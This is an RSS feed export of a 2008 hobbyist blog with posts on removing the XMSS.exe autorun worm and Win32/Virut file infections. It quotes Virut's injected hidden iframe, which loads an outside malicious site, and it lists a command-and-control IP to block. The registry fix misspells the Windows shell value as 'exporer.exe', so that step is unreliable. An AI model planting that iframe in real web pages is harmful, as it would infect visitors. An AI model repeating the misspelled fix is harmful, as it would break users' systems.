<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; Worm</title>
	<atom:link href="http://42.kaizeku.com/topics/security/worm/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>How to remove XMSS.exe Win32 AutoRun worm</title>
		<link>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/</link>
		<comments>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/#comments</comments>
		<pubDate>Sat, 16 Feb 2008 11:58:21 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[autorun.abt]]></category>

		<category><![CDATA[autorun.fj]]></category>

		<category><![CDATA[autorun.m]]></category>

		<category><![CDATA[prank]]></category>

		<category><![CDATA[Virus]]></category>

		<category><![CDATA[win32]]></category>

		<category><![CDATA[xmss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/xmss-exe-funny-ust-scandal-avi-worm/</guid>
		<description><![CDATA[

Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as xmss.exe. It copied itself on Local disk and Windows Directory (%Windir%). Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &#38; crashed System Internal Process Explorer (procxp.exe).
Its not a funny video
According to McAfee, this worm is known as W32/Autorun.worm.g.
It can propagate itself over [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/xmss-exe-funny-ust-scandal.png' alt='xmss-exe-funny-ust-scandal.png image by chaoskaizer' width='128' height='128' class="photo thumb- fl rgb-"/>Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as <em>xmss.exe</em>. It copied itself on Local disk and Windows Directory <small>(%Windir%)</small>. Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &amp; crashed System Internal <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" class="exturl icn-r1" rel="nofollow robots-nofollow">Process Explorer</a> (procxp.exe).</p>
<h2 class="cb">Its not a funny video</h2>
<p class="xmssexe-descriptions">According to <a href="http://vil.nai.com/vil/content/v_143758.htm" rel="nofollow" class="exturl icn-r1">McAfee</a>, this worm is known as <strong><tt class="di">W32/Autorun.worm.g</tt></strong>.</p>
<blockquote cite="http://vil.nai.com/vil/content/v_143758.htm"><p class="cite">It can propagate itself over removable media and network drives and cause execution of malicious code via an <tt class="di">autorun.inf</tt> file.</p>
</blockquote>
<p><span id="more-217"></span></p>
<h2 class="mgt mgb-">XMSS.exe Win32 AutoRun Files</h2>
<ul class="xoxo exturl">
<li><strong class="fw-"><tt class="di">x:autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<h2 class="cb mgt">Fixes Win32 AutoRun.* Worm</h2>
<p>Here&#8217;s a few step to prevent <strong class="fw-">Win32 AutoRun Worm</strong>. </p>
<ol class="xoxo">
<li>Disabled System Restore for Temporary - <a href="http://support.microsoft.com/kb/264887/en-us" class="exturl icn-r1" title="How to Enable and Disable System Restore">KB 264887</a></li>
<li>Boot Windows in Safe Mode - <a class="exturl icn-r1" href="http://support.microsoft.com/kb/315222" title="Safe Mode Boot options in Windows XP">KB 315222</a></li>
<li>
<p>In Windows Safe Mode, Open Windows Registry Editor</p>
<p><tt class="di">Windows Start > Run > Regedit</tt></p>
<li>
<p>Browse to the following registry settings &darr;</p>
<p><tt class="di">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</tt>
</li>
<li>Replace<br />
<em><tt class="di">explorer.exe, xmss.exe</tt></em> with <em><tt class="di">exporer.exe</tt></em><br />
<img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/xmss-exe-regedit.png' alt='xmss-exe-regedit.png' width="708" height="378" class="mgt mgb" />
</li>
<li>Delete all the following files
<ul class="xoxo">
<li><strong class="fw-"><tt class="di">C\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<p class="notice">%Windir% refers to the Windows folder (e.g. C:\Windows, C:\WindowsNT) and X: is drive letters used by a removable or network drive</p>
</li>
<li>Clean All Windows Temporary Files</li>
<li>Restart Windows</li>
</ol>
<h2 class="cb">XMSS.exe Win32 Autorun Variants</h2>
<p><small>VirusTotal.com - Dec 2007 Results.</small></p>
<table border="1">
<tr>
<td>Antivirus</td>
<td>Version</td>
<td>Last Update</td>
<td>Result</td</tr>
<tr>
<td>AhnLab-V3</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AntiVir</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Authentium</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Avast</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AVG</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>BitDefender</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.AutoRun.abt</td</tr>
<tr>
<td>ClamAV</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Autoit-6</td</tr>
<tr>
<td>DrWeb</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>eSafe</td>
<td>-</td>
<td>-</td>
<td style="color: red;">suspicious Trojan/Worm</td</tr>
<tr>
<td>eTrust-Vet</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Ewido</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>FileAdvisor</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Fortinet</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Autoit.BG!tr</td</tr>
<tr>
<td>F-Prot</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Trojan!c4a4</td</tr>
<tr>
<td>F-Secure</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>Ikarus</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>Kaspersky</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>McAfee</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Microsoft</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>NOD32v2</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Win32/HackAV.P</td</tr>
<tr>
<td>Norman</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Panda</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Suspicious file</td</tr>
<tr>
<td>Prevx1</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.DoS.Win32.Opdos</td</tr>
<tr>
<td>Rising</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.Win32.Autorun.jax</td</tr>
<tr>
<td>Sophos</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Sunbelt</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Symantec</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>TheHacker</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan/Autoit.bg</td</tr>
<tr>
<td>VBA32</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>VirusBuster</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.AutoIt.BB</td</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Riskware.HackAV</td</tr>
</table>
<h2 class="mgt mgb-">External Links</h2>
<ul class="xoxo exturl">
<li><a href="http://support.microsoft.com/kb/264887/en-us">How to Enable and Disable System Restore</a></li>
<li><a href="http://support.microsoft.com/kb/315222">Safe Mode Boot options in Windows</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Fixes for files infected with Win32/virut.Virtob and Variants</title>
		<link>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/</link>
		<comments>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/#comments</comments>
		<pubDate>Mon, 12 Nov 2007 12:35:30 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[A.gen]]></category>

		<category><![CDATA[Eldorado]]></category>

		<category><![CDATA[limpiar]]></category>

		<category><![CDATA[mefir]]></category>

		<category><![CDATA[Ofinpa.A]]></category>

		<category><![CDATA[Vipre]]></category>

		<category><![CDATA[Virtob]]></category>

		<category><![CDATA[virustotal]]></category>

		<category><![CDATA[Virut]]></category>

		<category><![CDATA[Virut.at]]></category>

		<category><![CDATA[Virut.Gen]]></category>

		<category><![CDATA[Virut.NAV]]></category>

		<category><![CDATA[Win32 Virus]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/fixed-for-files-infected-with-virutnat-mefir/</guid>
		<description><![CDATA[

I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. 

Don&#8217;t used &#8220;auto-clean/fix&#8221; online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you&#8217;ll need a search and replace tools for [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="summary"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY3MTAxMQ.curie,80,302" rel="external nofollow" rev="shareapic:webicons"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004671011.png" width="130" height="130" alt="Activity Monitor Virus Icons" class="fl" /></a>I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. </p>
<p><span id="more-5"></span></p>
<p>Don&#8217;t used &#8220;auto-clean/fix&#8221; online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you&#8217;ll need a <a href="http://blog.kakkoi.net/windows/fixed-for-files-infected-with-virutnat-mefir#search-and-replace-tools">search and replace tools</a> for removing the embed code inside the infected files.</p>
<ol class="xoxo" style="color:#444">
<li>Make sure all of the infected (*.exe win32/virtob) files has been quarantine.</li>
<li>Optionally block outbound access to <tt>78.109.19.139:80</tt> &amp; irc port <tt>65520</tt> in your firewall settings.</li>
<li>Disabled AntiVirus if any.</li>
<li>Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen).</li>
<li><a href="#search-and-replace-tools">Search</a> all files with <tt>*.htm, *.html, *.php, *.asp</tt> extensions.<br />
<strong>delete or replace</strong> the following text (strings)</p>
<pre>
&lt;iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"&gt;&lt;/iframe&gt;</pre>
</li>
</ol>
<h2 id="search-and-replace-tools" style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Search and Replace Tools</h2>
<ul class="xoxo" style="color:#555">
<li>For windows - there is lots of similar tools and I&#8217;m not sure which one to recommend as it seem most did the same thing so Google for <a href="http://www.google.com/search?q=search-and-replace&amp;ie=utf-8&amp;oe=utf-8">&#8220;search-and-replace&#8221;</a> pick your best. </li>
<li>For Cygwin or *nix bash console - Used <a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;hs=ms3&#038;q=Find+and+replace+%22sed%22&#038;btnG=Search" rel="nofollow">sed</a> commands to search &#038; replace strings in all infected files.</li>
<li> Python in windows - You can try <a href="http://www.google.com/search?hl=en&#038;client=firefox-a&#038;rls=org.mozilla%3Aen-US%3Aofficial&#038;q=python+Find+and+replace+string+in+file+&#038;btnG=Search">this solutions</a>.</li>
</ul>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Win32/Virut Virustotal.com Results</h2>
<table border="0">
<tr>
<th>Antivirus</th>
<th>Version</th>
<th>Last Update</th>
<th>Result</th>
</tr>
<tr>
<td>AhnLab-V3</td>
<td>2007.11.12.0</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>AntiVir</td>
<td>7.6.0.34</td>
<td>2007.11.12</td>
<td style="color: red">W32/Virut.AF</td>
</tr>
<tr>
<td>Authentium</td>
<td>4.93.8</td>
<td>2007.11.10</td>
<td>-</td>
</tr>
<tr>
<td>Avast</td>
<td>4.7.1074.0</td>
<td>2007.11.11</td>
<td style="color: red">Win32:Virtob</td>
</tr>
<tr>
<td>AVG</td>
<td>7.5.0.503</td>
<td>2007.11.11</td>
<td style="color: red">Win32/Virut</td>
</tr>
<tr>
<td>BitDefender</td>
<td>7.2</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virtob.6.Gen</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>9.00</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut.K</td>
</tr>
<tr>
<td>ClamAV</td>
<td>0.91.2</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut-5</td>
</tr>
<tr>
<td>DrWeb</td>
<td>4.44.0.09170</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.19</td>
</tr>
<tr>
<td>eSafe</td>
<td>7.0.15.0</td>
<td>2007.11.08</td>
<td>-</td>
</tr>
<tr>
<td>eTrust-Vet</td>
<td>31.2.5289</td>
<td>2007.11.12</td>
<td style="color: red">Win32/Virut.6375</td>
</tr>
<tr>
<td>Ewido</td>
<td>4.0</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>FileAdvisor</td>
<td>1</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Fortinet</td>
<td>3.11.0.0</td>
<td>2007.10.19</td>
<td style="color: red">W32/Virut.AE</td>
</tr>
<tr>
<td>F-Prot</td>
<td>4.4.2.54</td>
<td>2007.11.10</td>
<td style="color: red">W32/Injector.A.gen!Eldorado</td>
</tr>
<tr>
<td>F-Secure</td>
<td>6.70.13030.0</td>
<td>2007.11.12</td>
<td style="color: red">Virus.Win32.Virut.ab</td>
</tr>
<tr>
<td>Ikarus</td>
<td>T3.1.1.12</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virtob.AS</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>7.0.0.125</td>
<td>2007.11.12</td>
<td style="color: red">Virus.Win32.Virut.ab</td>
</tr>
<tr>
<td>McAfee</td>
<td>5160</td>
<td>2007.11.09</td>
<td style="color: red">W32/Virut.g</td>
</tr>
<tr>
<td>Microsoft</td>
<td>1.3007</td>
<td>2007.11.12</td>
<td style="color: red">Virus:Win32/Virut.Q</td>
</tr>
<tr>
<td>NOD32v2</td>
<td>2653</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Norman</td>
<td>5.80.02</td>
<td>2007.11.09</td>
<td style="color: red">W32/Virut.W</td>
</tr>
<tr>
<td>Panda</td>
<td>9.0.0.4</td>
<td>2007.11.11</td>
<td style="color: red">W32/Virutas.W</td>
</tr>
<tr>
<td>Prevx1</td>
<td>V2</td>
<td>2007.11.12</td>
<td>-</td>
</tr>
<tr>
<td>Rising</td>
<td>20.18.02.00</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.z</td>
</tr>
<tr>
<td>Sophos</td>
<td>4.23.0</td>
<td>2007.11.12</td>
<td style="color: red">W32/Vetor-G</td>
</tr>
<tr>
<td>Sunbelt</td>
<td>2.2.907.0</td>
<td>2007.11.09</td>
<td style="color: red">VIPRE.Suspicious</td>
</tr>
<tr>
<td>Symantec</td>
<td>10</td>
<td>2007.11.12</td>
<td style="color: red">W32.Virut.W</td>
</tr>
<tr>
<td>TheHacker</td>
<td>6.2.9.124</td>
<td>2007.11.12</td>
<td style="color: red">W32/Virut.gen</td>
</tr>
<tr>
<td>VBA32</td>
<td>3.12.2.4</td>
<td>2007.11.11</td>
<td>-</td>
</tr>
<tr>
<td>VirusBuster</td>
<td>4.3.26:9</td>
<td>2007.11.11</td>
<td style="color: red">Win32.Virut.Gen.4</td>
</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>6.0.1</td>
<td>2007.11.12</td>
<td style="color: red">Win32.Virut.AF</td>
</tr>
<tr>
<td colspan="4"></td>
</tr>
</table>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Notes on Microsoft Windows Malicious Software Removal Tool</h2>
<p><em>Update On: Nov,20 2007 by NoahArk</em><br />
I have <strong>Win.32/virut</strong> files in my archive (for backup purpose). Last week I installed <a title="Windows Malicious Software Removal tool" href="http://blog.kakkoi.net/uri/d3d3Lm1pY3Jvc29mdC5jb20vZG93bmxvYWRzL2RldGFpbHMuYXNweD9GYW1pbHlJZD1BRDcyNEFFMC1FNzJELTRGNTQtOUFCMy03NUI4RUIxNDgzNTY.curie,80,302">Microsoft Windows Malicious Software Removal tool v1.35</a> (Nov 13, 2007, KB890830).</p>
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2007/11/microsoft-malicious-software-removal-tool.gif" alt="Microsoft Malicious Software Removal Tool" style="margin: 0pt 5px 1px 0pt; float: left" /> Microsoft&#8217;s <a href="http://blog.kakkoi.net/uri/c3VwcG9ydC5taWNyb3NvZnQuY29tLz9rYmlkPTg5MDgzMA.curie,80,302" title="Microsoft Knowledge Base">claimed</a> this tool can fixes <em>w32/Virut</em> . But the results is much worsed than I expected. It doesn&#8217;t detect <strong>Win32/Virut </strong>on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob &amp; Virut[A-W] (infecting *.exe &amp; *.html). I&#8217;d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products.</p>
<p>I still keep the infected Win32/Virut files, if anyone need it please send an email to <img src="http://i.kakkoi.net/nhnoah-gmail.png" alt="nhnoah email" width="144" height="21" title="gmail" />. My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client&#8217;s (including me) wont have to hunt down on pricey antivirus solutions. </p>
<h2 style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">W32/Virut and ntkrnlpa.info</h2>
<blockquote><p>The worms started spreading since <span style="color:#444">September 2006</span>. After one year anniversay It still in the wild like it will never stop. </p></blockquote>
<p>I&#8217;d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. And also google is blocking the site too it will give you a warning notice if search for the particular url. </p>
<p>This worm spread via simple html tags and increased the filesize around 8kb. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. The thread label is debatable.</p>
<p> Based on wikipedia <a href="http://en.wikipedia.org/wiki/Usage_share_of_web_browsers">&#8220;Usage share of Web Browser Statistics&#8221;</a>, <strong>81%</strong> of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn&#8217;t blocked IFRAME that can be a problem. </p>
<p>Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. The results could be disaster. Nobody want to see its happening. </p>
<h2 id="related-post" style="margin-top:36px;border-top: 1px solid #ccc;padding-top:10px">Related Entries</h2>
<ul class="xoxo">
<li><a href="http://blog.kakkoi.net/virus/how-to-safeguard-your-windows-when-cleaning-files-infected-by-win32-virus/"> Tips on How to safeguard your Windows when cleaning files infected by win32 virus.</a></li>
<li> <a href="http://blog.kakkoi.net/windows/how-to-block-website-without-using-firewall/"> How to Block Acces to Unsavory Websites Without using Firewall or third party software</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/fixed-for-files-infected-with-virutnat-mefir/feed/</wfw:commentRss>
		</item>
		<item>
		<title>win32.virut Bad day for web developer</title>
		<link>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/</link>
		<comments>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/#comments</comments>
		<pubDate>Sun, 11 Nov 2007 23:20:31 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[ranting]]></category>

		<category><![CDATA[mefir]]></category>

		<category><![CDATA[virut.nat]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/one-really-bad-worm-for-web-developer/</guid>
		<description><![CDATA[

Just after my previous cleanup, now i got much worse virus on my PC its called Worm.Win32.Mefir [a-z] by both Norton Antivirus (Symantec) &#38; Avast (Alwil Software) NOD32 identified it as Win32/Virut.NAT
At the time being It infected *.html &#38; *.php files and probably all text/html types. There is no cure yet. I hated this worms [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>Just after my <a href="http://blog.kakkoi.net/virus/w32virutw/">previous cleanup</a>, now i got much worse virus on my PC its called <strong>Worm.Win32.Mefir</strong> [a-z] by both Norton Antivirus (Symantec) &amp; Avast (Alwil Software) NOD32 identified it as <strong>Win32/Virut.NAT</strong></p>
<p>At the time being It infected *.html &amp; *.php files and probably all text/html types. There is no cure yet. I hated this worms I&#8217;d lost few project because of this. Try archive (LZMA) all your web projects before hand. Its spreading like wild fire.</p>
<p>I havent try cleaning the infected files with Trend HouseCall Online Scans. Just hope there is cure for this worm. damn damn</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/ranting/one-really-bad-worm-for-web-developer/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
